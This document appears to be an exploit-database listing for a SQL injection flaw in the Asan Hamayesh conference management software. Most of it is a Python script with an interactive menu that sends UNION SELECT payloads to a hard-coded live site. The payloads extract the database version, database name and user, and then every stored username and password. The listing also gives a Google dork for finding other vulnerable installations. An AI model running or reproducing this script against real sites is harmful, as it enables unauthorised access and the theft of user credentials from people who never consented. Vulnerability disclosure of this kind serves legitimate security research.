Zaheb.ir | SQL Injection

2019.08.17
ir D3tect0r (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:طراح و پشتیبان : آسان همایش (نرم افزار مدیریت همایش و کنفرانس)

#!/usr/bin/python3 ################################################ # Title: Zaheb.ir | SQL Injection # Date: 2019-07-23 # Google Dork: intext:طراح و پشتیبان : آسان همایش (نرم افزار مدیریت همایش و کنفرانس) # Exploit Author: D3trct0r # Vendor Homepage: http://asanhamayesh.com # Tested on: GNU/Linux , Windows , FreeBsd , Android # CWE : CWE-89 ################################################ import requests from bs4 import BeautifulSoup try: print ('''\033[31m ███████╗ █████╗ ██╗ ██╗███████╗██████╗ ██╗██████╗ ╚══███╔╝██╔══██╗██║ ██║██╔════╝██╔══██╗ ██║██╔══██╗ ███╔╝ ███████║███████║█████╗ ██████╔╝ ██║██████╔╝ ███╔╝ ██╔══██║██╔══██║██╔══╝ ██╔══██╗ ██║██╔══██╗ ███████╗██║ ██║██║ ██║███████╗██████╔╝██╗██║██║ ██║ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═════╝ ╚═╝╚═╝╚═╝ ╚═╝ ███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗ ██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝ █████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║ ██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║ ███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║ ╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ Enter 'help' to show commands ''') while True: opt = input ("[root@Zaheb Exploit]# ") if opt == 'help' : print (''' version database userdb usernames passwords userpass exit ''') elif opt == 'version': payload = "+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+" url = "http://zaheb.ir/Post.php?id=-917" up = (url+payload) r = requests.get(up) html = BeautifulSoup(r.content,'html.parser') data = html.find_all('div',attrs={'class':'post-short'}) for i in data[0]: print('\033[31m ' ,i) elif opt == 'database': payload = "+union+select+1,2,3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+" url = "http://zaheb.ir/Post.php?id=-917" up = (url+payload) r = requests.get(up) html = BeautifulSoup(r.content,'html.parser') data = html.find_all('div',attrs={'class':'post-short'}) for i in data[0]: print('\033[31m ' ,i) elif opt == 'userdb': payload = "+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+" url = "http://zaheb.ir/Post.php?id=-917" up = (url+payload) r = requests.get(up) html = BeautifulSoup(r.content,'html.parser') data = html.find_all('div',attrs={'class':'post-short'}) for i in data[0]: print('\033[31m ' ,i) elif opt == 'usernames': payload = "+union+select+1,2,3,unhex(hex(group_concat(UserName))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+" url = "http://zaheb.ir/Post.php?id=-917" up = (url+payload) r = requests.get(up) html = BeautifulSoup(r.content,'html.parser') data = html.find_all('div',attrs={'class':'post-short'}) for i in data[0]: print('\033[31m ' ,i) elif opt == 'passwords': payload = "+union+select+1,2,3,unhex(hex(group_concat(PassWord))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+" url = "http://zaheb.ir/Post.php?id=-917" up = (url+payload) r = requests.get(up) html = BeautifulSoup(r.content,'html.parser') data = html.find_all('div',attrs={'class':'post-short'}) for i in data[0]: print('\033[31m ' ,i) elif opt == 'userpass': payload = "+union+select+1,2,3,unhex(hex(group_concat(UserName,0x3a,PassWord))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+" url = "http://zaheb.ir/Post.php?id=-917" up = (url+payload) r = requests.get(up) html = BeautifulSoup(r.content,'html.parser') data = html.find_all('div',attrs={'class':'post-short'}) for i in data[0]: print('\033[31m ' ,i) elif opt == 'exit': quit() else: print ("EXP:",opt,"Command Not Found") except SystemError: print ("Please Check Internet....")


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top